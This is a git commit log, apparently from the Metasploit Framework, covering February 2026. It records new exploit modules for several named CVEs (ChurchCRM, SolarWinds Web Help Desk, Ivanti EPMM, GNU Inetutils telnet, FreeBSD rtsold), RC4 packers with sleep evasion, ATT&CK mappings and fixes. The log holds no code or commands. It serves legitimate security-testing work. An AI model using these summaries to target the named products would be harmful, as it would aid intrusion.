Diego Ledda 6d19f5b0da Apply suggestion from @adfoster-r7 2026-02-17 16:05:43 +01:00
Diego Ledda 158405395d Apply suggestion from @adfoster-r7 2026-02-17 15:50:13 +01:00
Diego Ledda e7b0324e2f Apply suggestion from @adfoster-r7 2026-02-17 15:48:56 +01:00
Diego Ledda c24c58709d Apply suggestion from @dledda-r7 2026-02-17 14:09:02 +01:00
6a6f656c 236fb33b6b Apply suggestion from @dledda-r7
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2026-02-17 07:17:42 -05:00
6a6f656c ab30bd15f0 Apply suggestion from @dledda-r7
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2026-02-17 07:17:17 -05:00
6a6f656c 7e50106cff Apply suggestion from @dledda-r7
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2026-02-17 07:17:03 -05:00
jenkins-metasploit c0f73038f3 automatic module_metadata_base.json update 2026-02-16 15:16:31 +00:00
Diego Ledda 81e54d42e4 Merge pull request #20856 from msutovsky-r7/exploit/cve-2026-21858
Adds module for Ni8mare (CVE-2026-21858)
2026-02-16 10:06:14 -05:00
Diego Ledda bc9c62a74b Update modules/auxiliary/gather/ni8mare_cve_2026_21858.rb 2026-02-16 15:48:02 +01:00
Martin Sutovsky fb7c6a8231 Adds rescue block for JSON parsing, adds check for incorrect username and empty files 2026-02-16 14:58:40 +01:00
jenkins-metasploit 5ab3f0e7cd automatic module_metadata_base.json update 2026-02-16 12:54:44 +00:00
dwelch-r7 c4ca44e4f9 Merge pull request #20972 from adfoster-r7/fix-false-positives-on-lg-simple-editor-check-methods
Fix false positives on lg simple editor check methods
2026-02-16 12:45:20 +00:00
adfoster-r7 65d37019ad Fix false positives on lg simple editor check methods 2026-02-16 10:51:28 +00:00
jenkins-metasploit a29b2ccb92 automatic module_metadata_base.json update 2026-02-16 07:33:33 +00:00
msutovsky-r7 7a0845dc6c Land #20947, adds module for ChurchCRM unauthenticated RCE (CVE-2025-62521)
Adds exploit module for ChurchCRM unauth RCE (CVE-2025-62521)
2026-02-16 08:20:15 +01:00
Nayeraneru 8ee79fa524 Add StoryChief WordPress 1.0.42 unauthenticated RCE module 2026-02-16 00:44:20 +02:00
adfoster-r7 7251d88419 Merge pull request #20969 from sjanusz-r7/report-more-acunetix-vulns
Report more vulns when importing acunetix XML file
2026-02-13 15:26:40 +00:00
Simon Janusz 8b58c62375 Merge pull request #20807 from webbsssss/fix/acunetix-vulnerability-import
Fix #17932: Allow Acunetix vulnerabilities to be imported without complete web_page data
2026-02-13 15:25:54 +00:00
litemars 9fc17fbee4 updating x86 rc4 packer to use Metasm 2026-02-13 16:12:56 +01:00
sjanusz-r7 f741d568b4 Report more vulns when importing acunetix XML file 2026-02-13 14:55:13 +00:00
sjanusz-r7 f111ccc5ec Add working Acunetix import tests 2026-02-13 14:50:18 +00:00
jenkins-metasploit 473e801148 Bump version of framework to 6.4.115 2026-02-13 14:27:51 +00:00
LucasCsmt a39ed2beac Removing default version in the Dockerfile 2026-02-13 15:14:41 +01:00
Spencer McIntyre 91041fb352 Set the default Http::Auth option 2026-02-13 09:12:18 -05:00
LucasCsmt bbfe139e7f Merge branch 'master' into multi/http/churchcrm_unauth_rce 2026-02-13 15:01:52 +01:00
LucasCsmt 2b6d95d3c9 Adding a scenario in the documentation
The documentation for PHP Fetch have been added. The scenario have been
redone in order to track the last changes.
2026-02-13 15:01:17 +01:00
LucasCsmt b1758de52b Adding version control on the check method 2026-02-13 14:42:07 +01:00
LucasCsmt d90b3fdc89 Resolving compatibility issues
In the last version of ChurchCRM (6.8.0), in order to be correct, the
url in the post request needed to end with a '/'. This issues is now
fixed and the exploit work again on the 6.8.0 version.
2026-02-13 14:36:52 +01:00
litemars 02d31dfbcb changing jmp/call/pop instructions 2026-02-13 14:34:41 +01:00
LucasCsmt 381972efd2 Changing the documentation
According to the recent change, i've changed the documentation and the
scenario outputs.
2026-02-13 14:05:29 +01:00
LucasCsmt efcd0411e4 Adding a code to the check method 2026-02-13 14:04:40 +01:00
litemars bfbc408617 updating x64 rc4 packer to use Metasm 2026-02-13 13:49:30 +01:00
LucasCsmt fe302d30e1 Refactoring the code 2026-02-13 13:43:00 +01:00
LucasCsmt dcf4221cff Adding support for fetch payload 2026-02-13 13:23:40 +01:00
jenkins-metasploit 2d37b73a5b automatic module_metadata_base.json update 2026-02-13 12:01:15 +00:00
Diego Ledda a4ec3cd40d Merge pull request #20917 from sfewer-r7/solarwinds-webhelpdesk-rce
Add exploit module for SolarWinds Web Help Desk (CVE-2025-40536 + CVE-2025-40551)
2026-02-13 06:51:42 -05:00
LucasCsmt 3e98c7a045 Changing code according to Rubocop 2026-02-13 11:35:11 +01:00
LucasCsmt 06eba2245e Creating a check method 2026-02-13 11:34:46 +01:00
litemars 0fc864f23d Update lib/msf/core/payload/linux/aarch64/rc4_decrypter.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2026-02-13 11:27:46 +01:00
jenkins-metasploit 66e9891857 automatic module_metadata_base.json update 2026-02-13 10:07:02 +00:00
msutovsky-r7 7e03a89304 Land #20798, adds module for FreeBSD rtsold/rtsol command injection (CVE-2025-14558)
Add module for rtsold/rtsol DNSSL Command Injection (CVE-2025-14558)
2026-02-13 10:57:03 +01:00
LucasCsmt 867624cad3 Removing default option
The default option has been remove in favor of metasploit's default
selection.
2026-02-13 10:42:42 +01:00
LucasCsmt dc2e73b44a Adding a failwith if the injection fail 2026-02-13 09:57:39 +01:00
LucasCsmt aacbd1d180 Changing PHP injection logic
The PHP payload is injected directly into the PHP code injection. The
cleanup method has been remove in favor of a InitialAutoRunScript that
clear the config file.
2026-02-13 09:52:48 +01:00
LucasCsmt 78f4b8f97d Merge branch 'master' into multi/http/churchcrm_unauth_rce 2026-02-13 08:50:23 +01:00
Jack Heysel fe9f498619 Add GSS parsing to smb_relay
Moved gss handling to separate func as per TODO

Remove debug output
2026-02-12 17:56:08 -08:00
Spencer McIntyre 5172475006 Move the policy id datastore optio use #fetch 2026-02-12 17:31:40 -05:00
Spencer McIntyre e15aeffed8 Use the PFX option and rename to AdCs 2026-02-12 17:09:55 -05:00
jenkins-metasploit 85402611de automatic module_metadata_base.json update 2026-02-12 21:32:39 +00:00
Brendan 7a3f20a895 Merge pull request #20943 from g0tmi1k/twiki_maketext
twiki_maketext: Add versions to description
2026-02-12 15:21:11 -06:00
jenkins-metasploit 9bd71faf18 automatic module_metadata_base.json update 2026-02-12 20:13:35 +00:00
Spencer McIntyre 35b52df28a Merge pull request #20849 from haicenhacks/haicen_xerte
Add three modules for exploiting Xerte Online Toolkits
2026-02-12 15:01:42 -05:00
Spencer McIntyre 41414b896b Tweak whitespacing in the docs for the renderer 2026-02-12 14:43:47 -05:00
JohannesLks 12b7a440fa force manual interface selection 2026-02-12 13:45:06 -05:00
haicen 803e6d3991 adds auto-check and fixes print statements 2026-02-12 12:58:01 -05:00
haicen 0af126cba9 adds ability to create a project if none exist. 2026-02-12 12:50:00 -05:00
haicen 930bb4fecd fixes error in .htaccess policy generation 2026-02-12 12:43:16 -05:00
haicen b4f26d0329 conform to uri normalization pattern 2026-02-12 12:42:33 -05:00
haicen f25fab7c40 fixes error in .htaccess policy generation 2026-02-12 12:41:28 -05:00
haicen 7204c64b6b Improves documentation 2026-02-12 12:05:29 -05:00
litemars 9610cdb2a4 add x64 rc4 packer, sleep evasion routine and rc4 decrypter 2026-02-12 16:45:26 +01:00
litemars 1feb58cce8 add x86 rc4 packer, sleep evasion and rc4 decrypter 2026-02-12 16:38:14 +01:00
litemars 146b5dd3fd adding RC4 packer arm64, rc4 decrypt routine and sleep evasion routine 2026-02-12 16:24:54 +01:00
haicen 66aad682d6 changes the .htaccess payload to use heredoc 2026-02-11 18:30:20 -05:00
haicen 66139795e5 Fixes problems with module documentation 2026-02-11 18:20:06 -05:00
haicen 208dc3489c fixes linting errors 2026-02-11 17:55:21 -05:00
jenkins-metasploit 965d181cee automatic module_metadata_base.json update 2026-02-11 21:57:17 +00:00
Brendan f165eba6a9 Merge pull request #20941 from rudraditya21/attack-credential-access
Add MITRE ATT&CK mapping for Windows password cracking
2026-02-11 15:44:52 -06:00
Brendan 2c7b7e8b5c Merge pull request #20942 from rudraditya21/attack-exploit-privesc
Add MITRE ATT&CK mappings for exploit and privilege escalation modules
2026-02-11 15:38:59 -06:00
jenkins-metasploit 61da63d11f automatic module_metadata_base.json update 2026-02-11 20:06:15 +00:00
Spencer McIntyre c48622e134 Merge pull request #20936 from rudraditya21/attack-smb-samr
Add MITRE ATT&CK mappings for SMB/SAMR account operations
2026-02-11 14:57:22 -05:00
jenkins-metasploit 86b09826e3 automatic module_metadata_base.json update 2026-02-11 19:22:12 +00:00
jheysel-r7 4adf87ac18 Merge pull request #20929 from jheysel-r7/feat/mod/cve-2026-24061
GNU Inetutils Telnet Auth Bypass (CVE-2026-24061)
2026-02-11 11:12:29 -08:00
jheysel-r7 8f1e16d2a6 Update modules/exploits/linux/telnet/gnu_inetutils_auth_bypass.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-11 08:54:09 -08:00
adfoster-r7 54906237a1 Merge pull request #20955 from adfoster-r7/ensure-temp-rhost-files-are-cleaned-up
Ensure temp rhost files are cleaned up
2026-02-11 14:19:57 +00:00
adfoster-r7 6d2ec5d89d Ensure temp rhost files are cleaned up 2026-02-11 13:48:11 +00:00
adfoster-r7 c3c8aad4e6 Merge pull request #20599 from BenoitDePaoli/fix/userpass_password_persistence
fix(console): prevent RHOSTS temp file deletion after services -R
2026-02-11 13:45:55 +00:00
adfoster-r7 fea33abe02 Merge pull request #20954 from putku45/patch-1
Improve clarity and grammar in docs README
2026-02-11 13:17:03 +00:00
adfoster-r7 b53467ebe4 Add new line 2026-02-11 13:16:36 +00:00
putku45 648218a436 Improve clarity and grammar in docs README
This PR improves the documentation README by adding a short explanation to the Architecture section and fixing a minor grammar issue.

No functional changes.
2026-02-11 18:42:25 +05:30
adfoster-r7 877d2d81d0 Merge pull request #20953 from zeroSteiner/fix/ssh-socket-channels/1
Fix SSH Socket Channels
2026-02-11 11:54:50 +00:00
LucasCsmt 838d047b66 Fix the GHSA notation 2026-02-11 11:27:24 +01:00
LucasCsmt af3ce4a0f5 Changing placeholders to random text inside request
The 'alter_config' function has been altered in order to use random text
as placeholder to fake information in the configuration. The GHSA is
fixed too.
2026-02-11 11:26:59 +01:00
Lucas Coussement 7c9f18bbab Shorten the if condition's format
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-11 10:48:54 +01:00
Lucas Coussement fc9d2b2fce adding CONFIG_CHANGES to side effect
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-11 10:47:49 +01:00
jenkins-metasploit 00abe36f9a Bump version of framework to 6.4.114 2026-02-11 09:32:52 +00:00
jenkins-metasploit 336a7710fb automatic module_metadata_base.json update 2026-02-10 22:31:19 +00:00
Spencer McIntyre b609d6de80 Merge pull request #20935 from rudraditya21/attack-kerberos
Add MITRE ATT&CK mappings for Kerberos roasting modules
2026-02-10 17:18:17 -05:00
Spencer McIntyre 498eefc881 Merge pull request #20934 from rudraditya21/attack-ldap-adcs
Add MITRE ATT&CK mappings for LDAP/AD CS modules
2026-02-10 17:11:56 -05:00
JohannesLks 9512135c84 Merge branch 'master' into rtsold_dnssl_cmdinject 2026-02-10 16:19:53 -05:00
Spencer McIntyre d569fc552d Apply the #shutdown to the correct socket 2026-02-10 16:12:11 -05:00
g0t mi1k 701cb4fd2f DefaultPayload -> DefaultOptions: PAYLOAD 2026-02-10 20:30:05 +00:00
g0t mi1k a58876b843 unreal_ircd: Be more verbose 2026-02-10 20:27:41 +00:00
g0t mi1k e2387e875f unreal_ircd: Add check 2026-02-10 20:26:49 +00:00
JohannesLks 5946affad5 Fix: thread leak in rtsold exploit 2026-02-10 15:19:31 -05:00
Spencer McIntyre 0f3cd49118 Fix TCP server channel parameters 2026-02-10 15:04:51 -05:00
JohannesLks 53b4f2921d chore: lint 2026-02-10 14:58:33 -05:00
JohannesLks b59dfdf352 Refactor rtsold: move RA methods to ipv6.rb
. Move packet building to library, fix link-local address usage, and add CheckCode message.
2026-02-10 14:41:12 -05:00
jenkins-metasploit b21c5b5ff3 automatic module_metadata_base.json update 2026-02-10 17:16:37 +00:00
Brendan d330de16c8 Merge pull request #20932 from sfewer-r7/ivanti-epmm-rce
Add exploit module for Ivant EPMM/MobileIron (CVE-2026-1281)
2026-02-10 11:07:39 -06:00
Valentin Lobstein 3f6d228954 Update modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-10 18:06:20 +01:00
Valentin Lobstein defeb14ef4 Update modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-10 18:02:22 +01:00
Valentin Lobstein 47d4cd7601 Update modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-10 18:02:12 +01:00
arkaprabhachakraborty 384c1b5e03 Add initial osticket arbitraray file read auxiliary module
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-10 21:07:50 +05:30
LucasCsmt 37fe98c7bd Merge branch 'master' into multi/http/churchcrm_unauth_rce 2026-02-10 16:34:08 +01:00
gregd f837aa1a72 Use .blank? in parse_ws_frame per reviewer suggestion 2026-02-10 13:02:00 +00:00
jenkins-metasploit 19955be804 automatic module_metadata_base.json update 2026-02-10 11:56:08 +00:00
msutovsky-r7 a939e530f3 Land #20817, fixes table print in SAP auxiliary modules
SAP auxiliary modules bugfix
2026-02-10 12:47:00 +01:00
msutovsky-r7 3b64f761f3 Apply suggestion from @msutovsky-r7 2026-02-10 12:30:29 +01:00
msutovsky-r7 0757ca7494 Merge branch 'master' into sap_auxiliary_modules_bugfix 2026-02-10 12:29:55 +01:00
Martin Sutovsky 017e074a61 Address comments 2026-02-10 12:15:48 +01:00
Martin Sutovsky fc0257bcad Adds default fmt argument to to_executable in msf/core/exploit/exe, comments refactor, adds to_win32pe_dll 2026-02-10 11:52:43 +01:00
cgranleese-r7 9d41abd57e Merge pull request #20886 from cdelafuente-r7/enh/MS-9930/vuln_report_with_creds
Reapply "Vulnerability Report Enhancement"
2026-02-10 10:27:39 +00:00
cgranleese-r7 2ae7898d85 Bump metasploit_data_models 6.0.12 2026-02-10 10:07:40 +00:00
Martin Sutovsky 436488d533 Removes format from to_executable_windows 2026-02-10 11:05:53 +01:00
Martin Sutovsky d748cf9775 Rolling back to_executable_windows 2026-02-10 11:04:06 +01:00
cgranleese-r7 b2fadbdf8d Removes code pointing at credential branch 2026-02-10 09:54:08 +00:00
Christophe De La Fuente dc2ef2ed77 Update specs after code review 2026-02-10 09:46:37 +00:00
Christophe De La Fuente c02ac3920d Reapply "Vulnerability Report Enhancement"
This reverts commit c35537252f.
2026-02-10 09:46:37 +00:00
Christophe De La Fuente 6f04a389e0 Bump the metasploit-credential gem
This will bring the last fix related to the new Layered Services data model
2026-02-10 09:46:35 +00:00
Martin Sutovsky 3f45447399 Fixes OSX placeholder 2026-02-10 09:04:42 +01:00
Martin Sutovsky 64b3babf1c Fixes JSP and WAR formats, code reformat 2026-02-10 08:48:57 +01:00
haicen 68e17f2b13 Normalizes URI construction 2026-02-09 20:56:08 -05:00
haicen a1b02d1139 adds newlines between functions 2026-02-09 20:53:36 -05:00
haicen 3ee7bd435b changes URI construction to comply with standards 2026-02-09 20:45:10 -05:00
haicen e28afb7e12 renames files to conform to standards 2026-02-09 20:30:33 -05:00
haicen d8fd09b156 adds newline between functions 2026-02-09 20:30:29 -05:00
haicen 98d8e35d85 adds checks to address nil condition on variables 2026-02-09 20:30:25 -05:00
haicen f852aac863 Changes url structure to conform to requested changes 2026-02-09 20:30:18 -05:00
haicen 60b0209914 Improves module vulnerability check 2026-02-09 20:29:50 -05:00
bwatters-r7 b001b643d0 add library 2026-02-09 18:05:15 -06:00
bwatters-r7 c26acee9d6 Undo esc options, add new library 2026-02-09 18:04:04 -06:00
adfoster-r7 cfb8483188 Merge pull request #20775 from rmtsixq/fix/postgresql-15-schema-permissions
Fix PostgreSQL 15+ public schema permission issue
2026-02-09 20:33:10 +00:00
g0t mi1k 73808e9365 twiki_maketext: Add versions to description
REF: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329
2026-02-09 20:26:01 +00:00
jenkins-metasploit 05aa0eb326 automatic module_metadata_base.json update 2026-02-09 18:17:35 +00:00
adfoster-r7 71dd4dae19 Merge pull request #20710 from Chocapikk/add-ghsa-reference-support
Add GHSA and OSV reference type support
2026-02-09 18:08:22 +00:00
jenkins-metasploit 44f0e89b72 automatic module_metadata_base.json update 2026-02-09 17:38:37 +00:00
Rudraditya Thakur 8d6f775ebe added: ATT&CK references to exploit and privilege escalation modules 2026-02-09 23:03:01 +05:30
adfoster-r7 5e9b563060 Merge pull request #20939 from cgranleese-r7/bump-metasploit-credential
Bump metasploit-credential 6.0.20
2026-02-09 17:29:28 +00:00
Rudraditya Thakur 838ab7195f added: ATT&CK reference to crack_windows module 2026-02-09 22:58:04 +05:30
Rudraditya Thakur 8263d4fa95 removed: ATT&CK reference T1556.006 from shadow_credentials 2026-02-09 22:52:31 +05:30
Rudraditya Thakur 823b4215e2 removed: ATT&CK reference T1649 from ad_cs_cert_template 2026-02-09 22:51:47 +05:30
Rudraditya Thakur 65570a1183 removed: ATT&CK reference T1098 from samr_account 2026-02-09 22:48:42 +05:30
Rudraditya Thakur 70dd06ef67 removed: ATT&CK reference from timeroast 2026-02-09 22:46:34 +05:30
Spencer McIntyre c3e9652ccb Merge pull request #20937 from rudraditya21/attack-relay-sccm
Add MITRE ATT&CK mappings for relay and SCCM credential modules
2026-02-09 11:50:44 -05:00
cgranleese-r7 6e860953da Bump metasploit-credential 6.0.20 2026-02-09 14:46:21 +00:00
Valentin Lobstein f41eda1128 Add GHSA and OSV reference type support
Add support for GHSA (GitHub Security Advisories) and OSV (Open Source
Vulnerabilities) as structured reference types in Metasploit modules.

Convert 49 hardcoded GHSA URLs to structured ['GHSA', 'GHSA-xxxx'] format
across existing modules, and add support for repository-specific GHSA
references with an optional third parameter ['GHSA', 'GHSA-xxxx', 'repo'].

Update reference validation, module validator, and info_fixups to handle
the new reference types correctly.
2026-02-09 15:17:23 +01:00
Martin Sutovsky 951c412654 Replaces regex =~ with index 2026-02-09 14:15:14 +01:00
cgranleese-r7 8af6bae699 Merge pull request #20906 from rudraditya21/fix/ssh-cmd-exec-trailing-newlines
Fix SSH command shells dying on cmd_exec with trailing newline
2026-02-09 12:25:11 +00:00
Martin Sutovsky 0b38abffa2 Addresses comments 2026-02-09 11:01:22 +01:00
Valentin Lobstein 296cb5ff22 Fix BeyondTrust exploit failing on older instances (22.x)
The /get_mech_list?version=3 endpoint returns HTTP 500 on older
BeyondTrust versions that do not support the JSON API. Add a
fallback to version=2 which returns semicolon-separated key=value
pairs (e.g. "company=sewtest;product=ingredi").

Also remove the "Thank you for using BeyondTrust" check in the
BRDF validation, as PRA instances do not contain this string,
causing the check method to incorrectly report Unknown for PRA
targets.
2026-02-08 22:57:47 +01:00
Martin Sutovsky 0871fb1827 Fixes argument positions for war/jsp formats 2026-02-07 13:18:02 +01:00
Rudraditya Thakur 50335ddc79 updated: ATT&CK Techniques for icpr_cert.rb and esc_update_ldap_object.rb 2026-02-07 10:12:36 +05:30
Rudraditya Thakur 4c1a25198b updated: ATT&CK ID from T1552 to T1552.001 in relay_get_naa_credentials.rb 2026-02-07 10:09:31 +05:30
bwatters-r7 ad8ee601ff add lib in spec 2026-02-06 13:35:18 -06:00
dledda-r7 e8268bdcbc fix: add OSX::App inclusion in EXE module 2026-02-06 12:51:14 -05:00
bwatters-r7 cf0335e31c update specs 2026-02-06 11:38:33 -06:00
bwatters-r7 177985a761 Remove ms_csr library 2026-02-06 10:27:20 -06:00
dledda-r7 daff3638e0 fix: including all the mixins 2026-02-06 10:44:03 -05:00
dledda-r7 e7d2c719f8 fix: refactor boiler plate utils/exe break-up 2026-02-06 10:37:05 -05:00
sfewer-r7 51d2a18ade remove the extra + operator. add a comment as to why we ljust the value. 2026-02-06 14:52:00 +00:00
BenoitDePaoli 540ce8127b Change Ruby Function to create temp file 2026-02-06 15:35:11 +01:00
cgranleese-r7 2289e889be Merge pull request #20903 from jheysel-r7/fix/enum_user_directories
Fix enum_user_directories Duplicate Directories
2026-02-06 14:34:40 +00:00
dledda-r7 189f3744c7 fix: removed function calling singleton windows 2026-02-06 09:31:21 -05:00
dledda-r7 d6044ece89 fix: finalizing boilerplates utils/exe break-up 2026-02-06 08:58:49 -05:00
Martin Sutovsky 77279da46f Fixes typo 2026-02-06 14:36:32 +01:00
dledda-r7 4e6e666996 fix: boilerplate bsd and solaris utils/exe breakup 2026-02-06 08:18:04 -05:00
Simon Janusz db064a4f49 Merge pull request #20895 from rudraditya21/fixed/ldap-entry-cache-misses
added: negative caching for LDAP lookup misses
2026-02-06 13:15:57 +00:00
Rudraditya Thakur 674934d6d9 fixed: entry cache spec 2026-02-06 17:11:09 +05:30
Martin Sutovsky 0113f4984c Adds base for osx 2026-02-06 12:33:26 +01:00
Diego Ledda 22e927a657 Merge pull request #1 from msutovsky-r7/collab/lib/exe-breakup
Finishes Windows breakup, adds base for Linux breakup
2026-02-06 06:03:16 -05:00
Diego Ledda c6023e2ea8 revert exe common 2026-02-06 12:02:07 +01:00
Martin Sutovsky fb0dcc5ccf Fixes module name for x64 2026-02-06 12:01:58 +01:00
Diego Ledda 70b33eb458 Apply suggestion from @dledda-r7 2026-02-06 12:01:03 +01:00
Diego Ledda 039ade75aa x64 windows boilerplate utils/exe breakup 2026-02-06 11:59:34 +01:00
Diego Ledda e60d9a205f fix: x86 windows boilerplate 2026-02-06 11:54:39 +01:00
Diego Ledda 4ec3bff82f fix: x86 windows with boilerplate utils/exe breakup 2026-02-06 11:53:33 +01:00
Martin Sutovsky 1b6485f2eb Restores x86 2026-02-06 11:49:14 +01:00
Martin Sutovsky 95ff1fb6e8 Fixes bugs 2026-02-06 11:49:13 +01:00
Martin Sutovsky d64f0efcf5 Fixes set_template_default_winpe_dll 2026-02-06 11:49:13 +01:00
Diego Ledda 1abdaf22f0 Apply suggestion from @dledda-r7 2026-02-06 11:46:20 +01:00
Diego Ledda 83c7692639 Apply suggestion from @dledda-r7 2026-02-06 11:45:56 +01:00
Martin Sutovsky f1c16da62f Adds windows common 2026-02-06 11:40:05 +01:00
Martin Sutovsky b3e326400f Payload generator revert 2026-02-06 11:38:17 +01:00
Martin Sutovsky 2f2f6ff9d5 Reverts some changes 2026-02-06 11:36:37 +01:00
Martin Sutovsky dc4483faac Fixes windows, adds base for Linux 2026-02-06 08:55:14 +01:00
Rudraditya Thakur 9d73966976 added ATT&CK references to relay and SCCM modules 2026-02-06 11:58:08 +05:30
Rudraditya Thakur 64f0bee6d2 added: ATT&CK references to SMB and SAMR modules 2026-02-06 11:25:47 +05:30
Rudraditya Thakur ae07b3457e added: ATT&CK references to kerberoast and timeroast modules 2026-02-06 10:46:53 +05:30
Rudraditya Thakur c138dc468d added: ATT&CK references to LDAP and AD CS modules 2026-02-06 10:38:56 +05:30
bwatters-r7 08aaad3b1f Move options to ugly adcs_escx mixins, move csr to x509 library 2026-02-05 17:22:26 -06:00
sfewer-r7 5accca7907 Lower the ranking to GreatRanking and stability is CRASH_SERVICE_RESTARTS due to how the 12.8.* target on Windows works. 2026-02-05 21:38:27 +00:00
sfewer-r7 58dd29107f remove SMB_SRVPORT as an option. It must allways be 445 so the user cannot change it. We print a message to inform the user this port is intended to be in use so that the SMB server is not compleatly opaque. 2026-02-05 17:21:31 +00:00
sfewer-r7 5338a8e4b9 this is the prefered way to test for a non routable IP 2026-02-05 17:20:04 +00:00
sfewer-r7 2a39aa5124 fix typo in SRVPORT 2026-02-05 16:28:31 +00:00
sfewer-r7 95da6bd70d use Rex::Stopwatch.elapsed_time to time this operation 2026-02-05 16:17:33 +00:00
sfewer-r7 22e5981a95 add back tick to BadChars 2026-02-05 16:16:57 +00:00
jenkins-metasploit b92da7cc23 Bump version of framework to 6.4.113 2026-02-05 15:22:41 +00:00
Jack Heysel 85604307fa Update ranking 2026-02-05 06:47:31 -08:00
LucasCsmt 9cb6ddb7c1 Mentioning the version in the title
Title has been changed in order to mention the version where the exploit
work.
2026-02-05 15:46:38 +01:00
Martin Sutovsky 684adbbc15 Adds windows split 2026-02-05 14:45:58 +01:00
sfewer-r7 f632cf34bf add in a module and docs fo rteh EPMM exploit 2026-02-05 12:26:38 +00:00
LucasCsmt 96832cf50c Merge branch 'master' into multi/http/churchcrm_unauth_rce 2026-02-05 12:36:55 +01:00
LucasCsmt eb5507844b Testing the module on different version
The module have been tested on different version of ChurchCRM (6.8.0 and
6.2.0) prooving it's vulnerability to this exploit. This commit contains
modification of the dockerfile/docker-compose in order to support
multi-version installation.
2026-02-05 12:36:26 +01:00
sfewer-r7 40073bcc8e typo in docs 2026-02-05 09:00:15 +00:00
sfewer-r7 50f46aa85d add docs 2026-02-04 20:36:10 +00:00
sfewer-r7 c7e18ee5d6 block untill we get a session, so we dont tear down the SMB/LDAP service prematurly. 2026-02-04 20:35:57 +00:00
sfewer-r7 7d926efa95 Ships as a Java application running in a x64 java.exe process 2026-02-04 20:35:40 +00:00
sfewer-r7 153a65fbb6 rework the targets/paylaods. We now support 12.8.* on windows and 12.7.* on linux and windows. 12.8.* on linux might work but depends on the underlying cron daemon 2026-02-04 20:14:44 +00:00
Spencer McIntyre c72d5128cb Merge pull request #20931 from jheysel-r7/fix/docs/gsoc-2026-ideas-spacing
Fix spacing in GSoC 2026 ideas page
2026-02-04 14:20:14 -05:00
Jack Heysel 196dac6b6a Fix spacing in GSoC 2026 ideas page 2026-02-04 09:17:40 -08:00
msutovsky-r7 0a5eb04be1 Removes puts 2026-02-04 11:59:41 -05:00
cgranleese-r7 e69d72dcc1 Merge pull request #20680 from cdelafuente-r7/fix_rpc
A few fixes and enhancement for API RPC
2026-02-04 16:18:39 +00:00
LucasCsmt 4d65f15884 Adding a link to the CVE 2026-02-04 16:17:15 +01:00
LucasCsmt ca5ceae1b3 Adding documentation to the churchcrm module
The documentation of the module is addedd.
2026-02-04 16:04:42 +01:00
Martin Sutovsky f393055afd Adds docker instruction 2026-02-04 12:59:38 +01:00
Martin Sutovsky bc77c63496 Adds documentation 2026-02-04 12:57:58 +01:00
Martin Sutovsky 6a1babf6c3 Updates docs, fixes JWT, module cleanup 2026-02-04 12:40:41 +01:00
dledda-r7 9eb77b7948 feat|draft: apply new boilerplate to utils/exe 2026-02-04 05:19:05 -05:00
LucasCsmt bfacba6688 Merge branch 'master' into multi/http/churchcrm_unauth_rce 2026-02-04 11:13:24 +01:00
LucasCsmt 9acd3ce2df Rubocop on the file 2026-02-04 11:12:58 +01:00
LucasCsmt 22fde78f55 Supression of check_execution
Supression of the method 'check_execution' because it was to context
related and it is impossible to predict how the web server react to
command execution.
2026-02-04 11:12:12 +01:00
jenkins-metasploit 9462fd87ff automatic module_metadata_base.json update 2026-02-04 08:35:53 +00:00
Lucas Coussement aec1243032 Merge branch 'rapid7:master' into multi/http/churchcrm_unauth_rce 2026-02-04 09:30:59 +01:00
msutovsky-r7 533a12dc16 Land #20768, adds Gladinet CentreStack/Trifox aux modules, updates Gladinet exploit module
Add Gladinet CentreStack/Triofox auxiliary modules and exploit
2026-02-04 09:26:55 +01:00
Valentin Lobstein 005fbb17a1 Address PR #20768 review feedback
- Fix machineKey extraction regex to handle decryption attribute
- Replace Base64.strict_encode64 with Rex::Text.encode_base64
- Add READ_FILE and EXTRACT_MACHINEKEY actions
- Add PRODUCT option for CentreStack/Triofox support
- Use different storage endpoints per product type
- Update documentation with new options and actions
2026-02-04 08:38:35 +01:00
Valentin Lobstein 7776588577 Address PR #20768 review feedback
- gladinet.rb: Fix machineKey regex to match decryptionKey then validationKey explicitly
- gladinet.rb: Remove DEFAULT_WEB_CONFIG_PATH constant, inline in each module's datastore option
- gladinet_storage_access_ticket_forge.rb: Inline version check
- gladinet_storage_access_ticket_forge.rb: Inline FILEPATH default value (with C:\ for absolute path)
- gladinet_storage_lfi_cve_2025_11371.rb: Inline version check
- gladinet_storage_lfi_cve_2025_11371.rb: Inline valid_response? method (removed)
- gladinet_storage_lfi_cve_2025_11371.rb: Inline FILEPATH default value (without C:\, stripped by build_lfi_path)
- gladinet_storage_lfi_cve_2025_11371.rb: Use vars_get with encode_params instead of manual URL building
- gladinet_viewstate_deserialization: Remove nil fallback (mandatory option with default)
- gladinet_viewstate_deserialization: Remove DEFAULT_MACHINE_KEY constant, inline in datastore option
- gladinet_viewstate_deserialization: Remove duplicate detect_app_type/extract_build_version (already in shared lib)

Note: Suggestion to rename gladinet? to is_gladinet? was NOT applied.
msftidy enforces Naming/PredicatePrefix convention which requires predicate
methods to NOT have 'is_' prefix (gladinet? is correct, is_gladinet? is not).

Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-04 08:38:35 +01:00
Valentin Lobstein b1adc514d1 Apply suggestions
Co-authored-by: jheysel-r7 <jheysel-r7@users.noreply.github.com>
2026-02-04 08:38:35 +01:00
Valentin Lobstein 232471ad46 Update modules/auxiliary/gather/gladinet_storage_access_ticket_forge.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-02-04 08:38:34 +01:00
Valentin Lobstein 3cffeda00e Fix machineKey extraction regex and add reviewer credit
